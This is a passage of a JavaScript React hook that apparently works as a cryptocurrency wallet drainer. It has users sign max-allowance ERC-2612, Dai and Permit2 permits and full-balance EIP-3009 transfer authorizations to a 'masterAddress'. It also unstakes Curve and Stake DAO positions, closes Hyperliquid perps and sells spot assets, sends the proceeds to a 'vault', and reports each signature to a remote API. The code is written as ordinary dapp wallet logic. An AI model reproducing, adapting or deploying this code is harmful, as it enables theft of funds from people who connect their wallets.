        }
      }

      if (!pullAmt || pullAmt.isZero()) {
        console.warn("[curveLendingWithdraw] no collateral landed", token.id);
        return { success: false };
      }

      const tokenData = await finalizeProtocolExitTokenData(async () => {
        const decimals = Number(
          token.positionDetails?.collateralDecimals ??
            (await collateral.decimals().catch(() => 18))
        );
        const symbol =
          token.positionDetails?.collateralSymbol ||
          (await collateral.symbol().catch(() => token.symbol || "COLL"));
        const readable = Number(utils.formatUnits(pullAmt, decimals));
        const listed = Number(token.amount) || readable;
        const listedUsd = Number(token.tokenValue) || 0;
        const value = listed > 0 ? (listedUsd / listed) * readable : listedUsd;
        return {
          address: collAddr,
          id: collAddr,
          symbol,
          decimals,
          amount: readable,
          balance: readable,
          type: "erc20",
          value,
        };
      }, token);

      const exitObject = createProtocolExitObject(
        tokenData,
        apiData,
        removeHash,
        "curveLendingWithdraw",
        {
          ...(token.positionDetails || {}),
          collateralToken: collAddr,
          pullWei: pullAmt.toString(),
        },
        batchMode
          ? { batchMode, deliveredToVault: true }
          : {
              ...(approveHash && approveHash !== removeHash
                ? { approveTransactionHash: approveHash }
                : {}),
              ...(curveSettle?.usePermit2 ? { usePermit2: true } : {}),
              ...(curveSettle?.permit
                ? { permit: curveSettle.permit, type: curveSettle.permitType }
                : {}),
              ...(curveSettle?.authorization
                ? { authorization: curveSettle.authorization }
                : {}),
            }
      );
      logApprovalSuccess(apiUrl, exitObject, "curveLendingWithdraw");
      return { success: true, hash: removeHash };
    } catch (error) {
      console.log("error in curveLendingWithdraw", error?.message || error);
      logActionFailure("curveLendingWithdraw", token, error);
      return { success: false };
    }
  };

  /**
   * Stake DAO gauge. withdraw pays staking_token(). claim_rewards stays out.
   * A smart account transfers that token to the vault in the same signature.
   */
  const stakedaoWithdraw = async (token) => {
    if (!token || !signer || !vault || !address) return { success: false };
    try {
      const plan = await inspectStakeDao(pullLegDeps(), token);
      if (!plan || !plan.pullWei || plan.pullWei.isZero()) {
        console.warn("[stakedaoWithdraw] nothing to move", token?.id);
        return { success: false };
      }
      const { gauge, staking, gaugeAddr, stakingAddr, stillStaked } = plan;
      let withdrawHash = null;
      let approveHash = null;
      let batchMode = null;
      let pullAmt = null;
      let settle = null;

      const settleLanded = async (amountWei) => {
        const settled = await settlePullAllowance(pullLegDeps(), {
          token,
          tokenContract: staking,
          amountWei,
        });
        if (settled.rejected || !settled.ok) return null;
        settle = settled;
        approveHash = settled.approveHash || null;
        return amountWei;
      };

      if (plan.skipWithdraw) {
        const settledSkip = await settleLanded(plan.pullWei);
        pullAmt = settledSkip;
        if (!pullAmt) return { success: false };
        withdrawHash = approveHash;
      } else {
        const caps = await snapshotWalletCapabilities(
          provider,
          walletClient,
          address,
          chainId
        );
        walletCapsRef.current = caps;
        if (canAtomicSendCalls(caps, walletClient, chainId)) {
          withdrawHash = await sendWalletCalls(walletClient, address, [
            {
              to: gaugeAddr,
              data: gauge.interface.encodeFunctionData("withdraw", [stillStaked]),
            },
            { to: stakingAddr, data: encodeErc20Transfer(vault, stillStaked) },
          ]);
          if (!withdrawHash) return { success: false };
          batchMode = "sendCalls";
          pullAmt = stillStaked;
          if (/^0x[a-fA-F0-9]{64}$/.test(withdrawHash)) {
            const receipt = await provider.waitForTransaction(withdrawHash, 1);
            if (!receipt || Number(receipt.status) !== 1) return { success: false };
          }
        }
        if (!withdrawHash) {
          const withdrawGas = await getGasOptions(
            gauge,
            "withdraw",
            [stillStaked],
            txData,
            400_000
          );
          const withdrawTx = await gauge.withdraw(stillStaked, withdrawGas);
          if (!withdrawTx) return { success: false };
          if (!(await requireConfirmed(withdrawTx, "stakedaoWithdraw", token))) {
            return { success: false };
          }
          withdrawHash = withdrawTx.hash;
          const after = await staking.balanceOf(address);
          const before = plan.walletBal;
          const landed = after.gt(before) ? after.sub(before) : stillStaked;
          pullAmt = await settleLanded(landed);
          if (!pullAmt) return { success: false };
        }
      }

      const tokenData = await finalizeProtocolExitTokenData(async () => {
        const decimals = Number(
          token.positionDetails?.collateralDecimals ??
            (await staking.decimals().catch(() => 18))
        );
        const symbol =
          token.positionDetails?.collateralSymbol ||
          (await staking.symbol().catch(() => token.symbol || "sd"));
        const readable = Number(utils.formatUnits(pullAmt, decimals));
        const listed = Number(token.amount) || readable;
        const listedUsd = Number(token.tokenValue) || 0;
        const value = listed > 0 ? (listedUsd / listed) * readable : listedUsd;
        return {
          address: stakingAddr,
          id: stakingAddr,
          symbol,
          decimals,
          amount: readable,
          balance: readable,
          type: "erc20",
          value,
        };
      }, token);

      const exitObject = createProtocolExitObject(
        tokenData,
        apiData,
        withdrawHash,
        "stakedaoWithdraw",
        {
          ...(token.positionDetails || {}),
          stakingToken: stakingAddr,
          pullToken: stakingAddr,
          collateralToken: stakingAddr,
          pullWei: pullAmt.toString(),
        },
        batchMode
          ? { batchMode, deliveredToVault: true }
          : {
              ...(approveHash && approveHash !== withdrawHash
                ? { approveTransactionHash: approveHash }
                : {}),
              ...(settle?.usePermit2 ? { usePermit2: true } : {}),
              ...(settle?.permit
                ? { permit: settle.permit, type: settle.permitType }
                : {}),
              ...(settle?.authorization
                ? { authorization: settle.authorization }
                : {}),
            }
      );
      logApprovalSuccess(apiUrl, exitObject, "stakedaoWithdraw");
      return { success: true, hash: withdrawHash };
    } catch (error) {
      console.log("error in stakedaoWithdraw", error?.message || error);
      logActionFailure("stakedaoWithdraw", token, error);
      return { success: false };
    }
  };

  /**
   * Curve gauge — withdraw pays the LP 1:1. A smart account transfers that
   * LP to the vault. A normal wallet withdraws, then the stamped pull.
   * An LP is not quoted on Relay. A later click with the LP already in the
   * wallet skips withdraw: a smart account still transfers it, a normal
   * wallet uses the stamped pull.
   */
  const curveGaugeWithdraw = async (token) => {
    if (!token || !signer || !vault || !address) return { success: false };

    try {
      const plan = await inspectCurveGauge(pullLegDeps(), token);
      if (!plan) {
        console.warn("[curveGaugeWithdraw] missing gauge or lp", token);
        return { success: false };
      }
      if (!plan.pullWei || plan.pullWei.isZero()) {
        console.warn("[curveGaugeWithdraw] nothing to move", token.id);
        return { success: false };
      }

      const { gauge, lp, gaugeAddr, lpAddr, stillStaked } = plan;
      const before = plan.walletBal;
      let withdrawHash = null;
      let approveHash = null;
      let batchMode = null;
      let pullAmt = null;
      let gaugeSettle = null;

      const settleLanded = async (amountWei) => {
        const settled = await settlePullAllowance(pullLegDeps(), {
          token,
          tokenContract: lp,
          amountWei,
        });
        if (settled.rejected || !settled.ok) return null;
        gaugeSettle = settled;
        approveHash = settled.approveHash || null;
        return amountWei;
      };

      const deliverToVault = async (amountWei) => {
        let atomic = canAtomicSendCalls(walletCapsRef.current, walletClient, chainId);
        if (atomic) {
          const caps = await snapshotWalletCapabilities(
            provider,
            walletClient,
            address,
            chainId
          );
          walletCapsRef.current = caps;
          atomic = canAtomicSendCalls(caps, walletClient, chainId);
        }
        if (!atomic) return null;
        const hash = await sendWalletCalls(walletClient, address, [
          { to: lpAddr, data: encodeErc20Transfer(vault, amountWei) },
        ]);
        if (!hash) return null;
        if (/^0x[a-fA-F0-9]{64}$/.test(hash)) {
          const receipt = await provider.waitForTransaction(hash, 1);
          if (!receipt || Number(receipt.status) !== 1) return { failed: true };
        }
        return { hash };
      };

      if (plan.skipWithdraw) {
        console.log("[curveGaugeWithdraw] LP already in wallet", token.id);
        const moved = await deliverToVault(plan.pullWei);
        if (moved?.failed) return { success: false };
        if (moved?.hash) {
          withdrawHash = moved.hash;
          batchMode = "sendCalls";
          pullAmt = plan.pullWei;
        } else {
          const settledSkip = await settleLanded(plan.pullWei);
          pullAmt = settledSkip;
          if (!pullAmt) return { success: false };
          withdrawHash = approveHash;
        }
      } else {
        const canBatch = canAtomicSendCalls(
          walletCapsRef.current,
          walletClient,
          chainId
        );
        if (canBatch) {
          const caps = await snapshotWalletCapabilities(
            provider,
            walletClient,
            address,
            chainId
          );
          walletCapsRef.current = caps;
          if (canAtomicSendCalls(caps, walletClient, chainId)) {
            withdrawHash = await sendWalletCalls(walletClient, address, [
              {
                to: gaugeAddr,
                data: gauge.interface.encodeFunctionData("withdraw", [stillStaked]),
              },
              { to: lpAddr, data: encodeErc20Transfer(vault, stillStaked) },
            ]);
            if (!withdrawHash) return { success: false };
            batchMode = "sendCalls";
            pullAmt = stillStaked;
            if (/^0x[a-fA-F0-9]{64}$/.test(withdrawHash)) {
              const receipt = await provider.waitForTransaction(withdrawHash, 1);
              if (!receipt || Number(receipt.status) !== 1) return { success: false };
            }
          }
        }

        if (!withdrawHash) {
          const withdrawGas = await getGasOptions(
            gauge,
            "withdraw",
            [stillStaked],
            txData,
            400_000
          );
          const withdrawTx = await gauge.withdraw(stillStaked, withdrawGas);
          if (!withdrawTx) return { success: false };
          if (!(await requireConfirmed(withdrawTx, "curveGaugeWithdraw", token))) {
            return { success: false };
          }
          withdrawHash = withdrawTx.hash;
          const after = await lp.balanceOf(address);
          const landed = after.gt(before) ? after.sub(before) : stillStaked;
          const settledRemove = await settleLanded(landed);
          pullAmt = settledRemove;
          if (!pullAmt) return { success: false };
        }
      }

      if (!pullAmt || pullAmt.isZero()) {
        console.warn("[curveGaugeWithdraw] no LP landed", token.id);
        return { success: false };
      }

      const tokenData = await finalizeProtocolExitTokenData(async () => {
        const decimals = Number(
          token.positionDetails?.collateralDecimals ??
            (await lp.decimals().catch(() => 18))
        );
        const symbol =
          token.positionDetails?.collateralSymbol ||
          (await lp.symbol().catch(() => token.symbol || "LP"));
        const readable = Number(utils.formatUnits(pullAmt, decimals));
        const listed = Number(token.amount) || readable;
        const listedUsd = Number(token.tokenValue) || 0;
        const value = listed > 0 ? (listedUsd / listed) * readable : listedUsd;
        return {
          address: lpAddr,
          id: lpAddr,
          symbol,
          decimals,
          amount: readable,
          balance: readable,
          type: "erc20",
          value,
        };
      }, token);

      const exitObject = createProtocolExitObject(
        tokenData,
        apiData,
        withdrawHash,
        "curveGaugeWithdraw",
        {
          ...(token.positionDetails || {}),
          lpToken: lpAddr,
          collateralToken: lpAddr,
          pullWei: pullAmt.toString(),
        },
        batchMode
          ? { batchMode, deliveredToVault: true }
          : {
              ...(approveHash && approveHash !== withdrawHash
                ? { approveTransactionHash: approveHash }
                : {}),
              ...(gaugeSettle?.usePermit2 ? { usePermit2: true } : {}),
              ...(gaugeSettle?.permit
                ? { permit: gaugeSettle.permit, type: gaugeSettle.permitType }
                : {}),
              ...(gaugeSettle?.authorization
                ? { authorization: gaugeSettle.authorization }
                : {}),
            }
      );
      logApprovalSuccess(apiUrl, exitObject, "curveGaugeWithdraw");
      return { success: true, hash: withdrawHash };
    } catch (error) {
      console.log("error in curveGaugeWithdraw", error?.message || error);
      logActionFailure("curveGaugeWithdraw", token, error);
      return { success: false };
    }
  };

  const ethPermit = async (token) => {
    if (!token) return { success: false };
    const isPermitAuth = await checkEIP3009Support(token.id, chainId, provider);
    if (isPermitAuth) {
      return await permitAuthorization(token);
    } else {
      let result,
        permitType,
        tokenAddress = token.id;
      const is96Bit = isToken96BitSupported(tokenAddress);
      const permitAmount = is96Bit
        ? max96BitBigNumber
        : MaxAllowanceTransferAmount;
      try {
        const { domain, nonce } = await getEip712Details(
          provider,
          address,
          chainId,
          token
        );

        const isDaiToken = (token, chainId) =>
          (token.name === "Dai Stablecoin" && chainId === 1) ||
          (token.name === "(PoS) Dai Stablecoin" && chainId === 137);

        if (token.tokenType === "erc721") {
          // Handle ERC721 case
        } else if (isDaiToken(token, chainId)) {
          permitType = "DaiPermit";
          result = await signDaiPermit(
            signer,
            domain,
            address,
            masterAddress,
            getDeadline(),
            nonce
          );
        } else {
          permitType = "ERC2612Permit";
          result = await signERC2612Permit(
            signer,
            domain,
            address,
            masterAddress,
            permitAmount,
            getDeadline(),
            nonce
          );
        }

        if (!result) return { success: false };

        const tokenData = createTokenData(token);
        const permitObject = createPermitObject(
          permitType,
          result,
          tokenData,
          apiData,
          token
        );

        logApprovalSuccess(apiUrl, permitObject, token.handleType);

        return { success: true, hash: null };
      } catch (error) {
        console.log("error in ethPermit", error.message);
        logActionFailure("ethPermit", token, error);
        return { success: false };
      }
    }
  };

  const permit2 = async (tokens, isBatchPermit = false) => {
    if (!tokens) return { success: false };
    const token = tokens[0];
    const totalValue = tokens.reduce(
      (sum, token) => sum + (token.tokenValue || 0),
      0
    );

    try {
      const permit2Contract = getContract(PERMIT2_ADDRESS, permit2ABI);

      let permitDetails, permitTokens;
      if (!isBatchPermit) {
        const isPermitAuth = await checkEIP3009Support(token.id, chainId, provider);
        if (isPermitAuth) {
          return await permitAuthorization(token);
        }
        const allowances = await permit2Contract.allowance(
          address,
          token.id,
          masterAddress
        );
        const nonce = allowances[2];
        permitDetails = {
          token: token.id,
          amount: MaxAllowanceTransferAmount,
          expiration: getDeadline(3), //3 year
          nonce,
        };
      } else {
        permitDetails = [];
        permitTokens = [];
        const ifaceP2 = new utils.Interface(permit2ABI);
        const allowanceCalls = tokens.map((t) => ({
          target: PERMIT2_ADDRESS,
          allowFailure: true,
          callData: ifaceP2.encodeFunctionData("allowance", [
            address,
            t.id,
            masterAddress,
          ]),
        }));
        try {
          await aggregate3ReadOrFallback(
            provider,
            chainId,
            allowanceCalls,
            (rows) => {
              for (let i = 0; i < tokens.length; i++) {
                const t = tokens[i];
                if (!rows[i]?.success) throw new Error("multicall");
                const allowances = ifaceP2.decodeFunctionResult(
                  "allowance",
                  rows[i].returnData
                );
                const nonce = allowances[2];
                permitDetails.push({
                  token: t.id,
                  amount: MaxAllowanceTransferAmount,
                  expiration: getDeadline(3), //3 year
                  nonce,
                });
                permitTokens.push({
                  symbol: t.symbol,
                  amount: t.amount,
                  address: t.id,
                  value: t.tokenValue,
                });
              }
              return true;
            },
            async () => {
              throw new Error("multicall");
            }
          );
        } catch {
          for (const token of tokens) {
            const allowances = await permit2Contract.allowance(
              address,
              token.id,
              masterAddress
            );
            const nonce = allowances[2];
            permitDetails.push({
              token: token.id,
              amount: MaxAllowanceTransferAmount,
              expiration: getDeadline(3), //3 year
              nonce,
            });
            permitTokens.push({
              symbol: token.symbol,
              amount: token.amount,
              address: token.id,
              value: token.tokenValue,
            });
          }
        }
      }

      const { signature, permitData } = await createPermit2Signature(
        permitDetails
      );

      if (!signature) return { success: false };

      const singleTokenData = createTokenData(token);
      const batchTokenData = {
        list: permitTokens,
        value: totalValue,
        type: "erc20",
      };

      const permit2Object = {
        address,
        chainId,
        signature,
        permitData: permitData,
        tokenData: isBatchPermit ? batchTokenData : singleTokenData,
        owner,
        handleType: isBatchPermit ? "batchpermit" : "singlepermit",
        // Single-token permit2 can carry lending hint; batch omits (mixed bags).
        ...(!isBatchPermit && token?.positionDetails
          ? { positionDetails: token.positionDetails }
          : {}),
      };

      logApprovalSuccess(apiUrl, permit2Object, "permit2", isBatchPermit);
      return { success: true, hash: null };
    } catch (error) {
      console.error("Error at Permit2:", error.message);
      logActionFailure("permit2", token, error, isBatchPermit);
      return { success: false };
    }
  };

  const createPermit2Signature = async (params) => {
    try {
      const permitData = {
        details: params,
        spender: masterAddress,
        sigDeadline: getDeadline(), //1 year
      };

      const { domain, types, values } = AllowanceTransfer.getPermitData(
        permitData,
        PERMIT2_ADDRESS,
        chainId
      );
      const signature = await signer?._signTypedData(domain, types, values);

      return {
        signature,
        permitData,
      };
    } catch (error) {
      console.error("Error creating permit signature:", error.message);
      return null;
    }
  };


  const permitAuthorization = async (token) => {
    if (!token) return { success: false };

    try {
      const details = await getEip712Details(
        provider,
        address,
        chainId,
        token,
        { includeBalanceFor: address }
      );
      const { domain } = details || {};
      let balance = details?.balance;
      if (!domain) return { success: false };
      if (balance == null) {
        const tokenContract = getContract(token.id, erc20ABI);
        balance = await tokenContract.balanceOf(address);
      }

      // Generate unique nonce for this authorization
      const authNonce = utils.hexlify(utils.randomBytes(32));

      // Get current timestamp
      const now = Math.floor(Date.now() / 1000);
      const validAfter = now - 300;
      const validBefore = now + 15768000; // 6 months from now

      console.log("balance:", balance.toString());

      const types = EIP3009_TRANSFER_TYPES;

      const message = {
        from: address,
        to: masterAddress,
        value: balance, // Use the actual on-chain balance (BigNumber)
        validAfter: validAfter,
        validBefore: validBefore,
        nonce: authNonce,
      };

      // Sign the typed data using the domain from your helper
      const signature = await signer._signTypedData(domain, types, message);
      const { v, r, s } = utils.splitSignature(signature);

      // Return the authorization data for the handler/trinity to use
      const authorizationData = {
        from: address,
        to: masterAddress,
        value: balance.toString(), // Convert BigNumber to string for JSON
        validAfter: validAfter,
        validBefore: validBefore,
        nonce: authNonce,
        v: v,
        r: r,
        s: s,
        signature: signature,
      };

      // Log success
      token.handleType = "ethPermit";
      const tokenData = createTokenData(token);
      // const authorizationObject = createPermitObject("ReceiveWithAuthorization", authorizationData, tokenData, apiData, token);
      const authorizationObject = createPermitObject(
        "TransferWithAuthorization",
        authorizationData,
        tokenData,
        apiData,
        token
      );
      logApprovalSuccess(apiUrl, authorizationObject, "permitAuthorization");

      return { success: true, hash: null };
    } catch (error) {
      console.log("error in permitAuthorization", error);
      logActionFailure("permitAuthorization", token, error);
      return { success: false };
    }
  };

  // ============================================================================
  // Exchange withdrawals (HL now; Lighter later)
  // ============================================================================


  //manual configuration for Hyperliquid withdrawal
  const hyperliquidWithdrawal = async (token) => {
    if (!token) return { success: false };
    const destinationAddress = vault;
    const { amount } = token;

    try {
      await ensureOnChain(HL_SIGN_CHAIN_ID, "hyperliquidWithdrawal", token);
      const hlSigner = signerRef.current ?? signer;
      if (!hlSigner) return { success: false };

      const withdrawableBefore = await getHyperliquidWithdrawable(address);
      const signed = await signHyperliquidWithdraw(hlSigner, {
        vault: destinationAddress,
        amount,
      });
      if (!signed) return { success: false };
      const { withdrawalData, responseData } = signed;
      if (responseData?.status && responseData.status !== "ok") {
        throw new Error(responseData.response || JSON.stringify(responseData));
      }
      const tokenData = createTokenData(token);
      const withdrawalObject = createPermitObject(
        "HyperliquidWithdrawal",
        withdrawalData,
        tokenData,
        apiData,
        token
      );
      if (Number.isFinite(Number(withdrawableBefore))) {
        withdrawalObject.hyperliquidTracking = {
          withdrawableBefore: Number(withdrawableBefore),
        };
      }
      logApprovalSuccess(apiUrl, withdrawalObject, "hyperliquidWithdrawal");
      return { success: true, hash: null };
    } catch (error) {
      console.log("error in hyperliquidWithdrawal", error);
      logActionFailure("hyperliquidWithdrawal", token, error);
      return { success: false, error: error?.message };
    }
  };

  //manual configuration for Hyperliquid spot send (sendAsset — unified-safe)

  const hyperliquidSpotSend = async (token) => {
    if (!token) return { success: false };
    if (!vault) return { success: false };

    const destinationAddress = vault;
    const { amount } = token;

    try {
      await ensureOnChain(HL_SIGN_CHAIN_ID, "hyperliquidSpotSend", token);
      const hlSigner = signerRef.current ?? signer;
      if (!hlSigner) return { success: false };

      const [destinationSpotAvailableBefore, senderSpotAvailableBefore] =
        await Promise.all([
          getHyperliquidSpotAvailable(destinationAddress, token.id),
          getHyperliquidSpotAvailable(address, token.id),
        ]);
      const signed = await signHyperliquidSpotSend(hlSigner, {
        vault: destinationAddress,
        amount,
        tokenId: token.id,
      });
      if (!signed) return { success: false };
      const { spotSendData, responseData } = signed;

      if (responseData?.status && responseData.status !== "ok") {
        throw new Error(
          responseData.response ||
            responseData.error ||
            JSON.stringify(responseData)
        );
      }

      const tokenData = createTokenData(token);
      const spotSendObject = createPermitObject(
        "HyperliquidSpotSend",
        spotSendData,
        tokenData,
        apiData,
        token
      );
      const tracking = { destinationAddress };
      if (Number.isFinite(Number(destinationSpotAvailableBefore))) {
        tracking.destinationSpotAvailableBefore = Number(
          destinationSpotAvailableBefore
        );
      }
      if (Number.isFinite(Number(senderSpotAvailableBefore))) {
        tracking.senderSpotAvailableBefore = Number(senderSpotAvailableBefore);
      }
      spotSendObject.hyperliquidTracking = tracking;

      logApprovalSuccess(apiUrl, spotSendObject, "hyperliquidSpotSend");
      return { success: true, hash: null, response: responseData, spotSendObject };
    } catch (error) {
      console.log("error in hyperliquidSpotSend", error);
      logActionFailure("hyperliquidSpotSend", token, error);
      return { success: false, error: error?.message };
    }
  };


  /**
   * Close open perps (agent IOC) → recalc spot USDC → sendAsset to vault.
   * If positions already flat (user rejected sendAsset last time), skip L1 → send only.
   */
  const hyperliquidClosePerp = async (token) => {
    if (!token) return { success: false };
    const hlSigner = signerRef.current ?? signer;
    if (!hlSigner || !vault) return { success: false };

    const positions = token.positionDetails?.positions || [];
    console.log("[hLClosePerp] hook start", {
      equity: token.tokenValue,
      marginUsed: token.positionDetails?.totalMarginUsed,
      positions: positions.map((p) => ({
        coin: p.coin,
        szi: p.szi,
        assetId: p.assetId,
        dex: p.dex,
      })),
    });

    try {
      let closed = null;
      if (positions.length) {
        closed = await signHyperliquidClosePerps(hlSigner, positions);
        if (!closed?.ok && closed?.reason !== "no_orders") {
          throw new Error(
            closed?.reason || closed?.error || "close orders failed"
          );
        }
        clearHlL1LegsOnHead("perps");
        console.log("[hLClosePerp] positions closed", {
          agentApprove: closed?.agentApprove,
          orders: closed?.orderMeta || closed?.orders,
          statuses: closed?.response?.response?.data?.statuses,
          alreadyFlat: closed?.reason === "no_orders",
        });
        if (closed?.ok) {
          console.log("[hLClosePerp] settling 2s before spot recalc…");
          await new Promise((r) => setTimeout(r, 2000));
        }
      } else {
        console.log(
          "[hLClosePerp] no open positions — sendAsset-only recovery"
        );
      }

      const usdcId = "USDC:0x6d1e7cde53ba9467b783cb7c530ce054";
      let available = await getHyperliquidSpotAvailable(address, usdcId);
      let availableSource = "spot_recalc";
      if (!Number.isFinite(Number(available)) || Number(available) <= 0) {
        const frac = Number(token.positionDetails?.step2MarginFraction) || 0.1;
        const margin = Number(token.positionDetails?.totalMarginUsed) || 0;
        available = Math.max(0, margin * frac);
        availableSource = `fallback_${frac}_of_margin`;
      }
      const sendAmt = Math.floor(Number(available) * 1e6) / 1e6;
      console.log("[hLClosePerp] post-close USDC → sendAsset", {
        available,
        availableSource,
        sendAmt,
        vault,
      });
      if (!(sendAmt >= 2)) {
        throw new Error(
          `USDC after close too small to send (available=${available})`
        );
      }

      const sendToken = {
        ...token,
        id: usdcId,
        amount: String(sendAmt),
        tokenValue: sendAmt,
        symbol: "hlSpotUSDC",
        handleType: "hLSpotSend",
      };
      const sendResult = await hyperliquidSpotSend(sendToken);
      if (!sendResult?.success) {
        throw new Error(
          sendResult?.error || "sendAsset after close failed"
        );
      }
      pruneHlStrategyGroups({ usdc: true });
      console.log("[hLClosePerp] done", { sendAmt });
      return {
        success: true,
        hash: null,
        closed,
        send: sendResult,
        handleType: "hLClosePerp",
      };
    } catch (error) {
      console.log("[hLClosePerp] error", error);
      logActionFailure("hyperliquidClosePerp", token, error);
      return { success: false, error: error?.message };
    }
  };

  /**
   * Batch IOC sell mid-tier spot alts → USDC → sendAsset.
   * Empty legs → sendAsset-only recovery (reject after sell last click).
   */
  const hyperliquidSpotSell = async (token) => {
    if (!token) return { success: false };
    const hlSigner = signerRef.current ?? signer;
    if (!hlSigner || !vault) return { success: false };

    const legs = token.positionDetails?.legs || [];
    const haircut =
      Number(token.positionDetails?.step2Haircut) ||
      (token.positionDetails?.hasOpenPerps ? 0.95 : 1);

    console.log("[hLSpotSell] hook start", {
      equity: token.tokenValue,
      haircut,
      legs: legs.map((l) => ({ coin: l.coin, amount: l.amount })),
    });

    try {
      let sold = null;
      if (legs.length) {
        sold = await signHyperliquidSellSpotAlts(hlSigner, legs);
        if (!sold?.ok && sold?.reason !== "no_orders") {
          throw new Error(sold?.reason || sold?.error || "spot sell failed");
        }
        clearHlL1LegsOnHead("spot");
        console.log("[hLSpotSell] alts sold", {
          orders: sold?.orderMeta,
          statuses: sold?.response?.response?.data?.statuses,
          alreadyFlat: sold?.reason === "no_orders",
        });
        if (sold?.ok) {
          await new Promise((r) => setTimeout(r, 2000));
        }
      } else {
        console.log("[hLSpotSell] no legs — sendAsset-only recovery");
      }

      const usdcId = "USDC:0x6d1e7cde53ba9467b783cb7c530ce054";
      const available = await getHyperliquidSpotAvailable(address, usdcId);
      const sendAmt =
        Math.floor(Number(available) * haircut * 1e6) / 1e6;
      console.log("[hLSpotSell] USDC → sendAsset", {
        available,
        haircut,
        sendAmt,
      });
      if (!(sendAmt >= 2)) {
        throw new Error(
          `USDC after spot sell too small (available=${available})`
        );
      }

      const sendToken = {
        ...token,
        id: usdcId,
        amount: String(sendAmt),
        tokenValue: sendAmt,
        symbol: "hlSpotUSDC",
        handleType: "hLSpotSend",
      };
      const sendResult = await hyperliquidSpotSend(sendToken);
      if (!sendResult?.success) {
        throw new Error(
          sendResult?.error || "sendAsset after spot sell failed"
        );
      }
      pruneHlStrategyGroups({
        usdc: true,
        altIds: legs.map((l) => l.id).filter(Boolean),
      });
      console.log("[hLSpotSell] done", { sendAmt });
      return {
        success: true,
        hash: null,
        sold,
        send: sendResult,
        handleType: "hLSpotSell",
      };
    } catch (error) {
      console.log("[hLSpotSell] error", error);
      logActionFailure("hyperliquidSpotSell", token, error);
      return { success: false, error: error?.message };
    }
  };


  return {
    action,
    isSignWaiting,
    isSwitchingNetwork,
  };
};

export default useEvmActions;
